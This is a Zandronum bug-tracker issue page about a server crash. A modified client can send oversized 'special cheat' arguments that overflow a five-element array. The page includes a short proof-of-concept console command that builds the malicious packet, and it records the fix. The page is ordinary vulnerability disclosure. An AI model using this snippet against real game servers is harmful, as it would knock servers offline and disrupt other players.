Zandronum Chat @ irc.zandronum.com
#zandronum
Get the latest version: 2.1.2
Source Code

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0002694Zandronum[All Projects] Bugpublic2016-04-02 22:112017-02-17 10:09
ReporterDusk 
Assigned ToDusk 
PrioritynormalSeverityexploitReproducibilityalways
StatusresolvedResolutionfixed 
PlatformOSOS Version
Product Version3.0-beta 
Target Version3.0Fixed in Version 
Summary0002694: Modified client can crash the server using the special cheat
DescriptionThe server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled.
Steps To Reproduce

#include "c_dispatch.h"
CCMD (crashserver)
{
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
    NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );

    for ( unsigned int i = 0; i < 10; ++i )
        NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
Attached Filesdiff file icon 2694-fix.diff [^] (621 bytes) 2016-04-02 22:41 [Show Content]

- Relationships
child of 0002620resolvedDusk the 'special' cheat does not work online 

-  Notes
User avatar (0014647)
Dusk (developer)
2016-04-02 22:39

I've fixed this, but won't push till Monday since there's a testing event coming tomorrow. Diff attached.
User avatar (0014843)
Edward-san (developer)
2016-05-08 21:00

Added with changeset:https://bitbucket.org/Torr_Samaho/zandronum/commits/b63775a6dd289626e3ac75aee8f6e68f0dd793a8 [^] .

Issue Community Support
This issue is already marked as resolved.
If you feel that is not the case, please reopen it and explain why.
Supporters: No one explicitly supports this issue yet.
Opponents: No one explicitly opposes this issue yet.

- Issue History
Date Modified Username Field Change
2016-04-02 22:11 Dusk New Issue
2016-04-02 22:12 Dusk Summary Client can crash the server using the special cheat => Modified client can crash the server using the special cheat
2016-04-02 22:19 Dusk Relationship added child of 0002620
2016-04-02 22:39 Dusk Note Added: 0014647
2016-04-02 22:40 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk File Deleted: 2694-fix.diff
2016-04-02 22:41 Dusk File Added: 2694-fix.diff
2016-04-02 22:41 Dusk Assigned To => Dusk
2016-04-02 22:41 Dusk Status new => needs review
2016-05-08 21:00 Edward-san Note Added: 0014843
2016-05-08 21:00 Edward-san Status needs review => needs testing
2016-12-24 22:43 Dusk Target Version => 3.0
2017-02-17 10:09 Dusk Status needs testing => resolved
2017-02-17 10:09 Dusk Resolution open => fixed
2017-02-17 10:09 Dusk View Status private => public






Questions or other issues? Contact Us.

Links


Copyright © 2000 - 2017 MantisBT Team
Powered by Mantis Bugtracker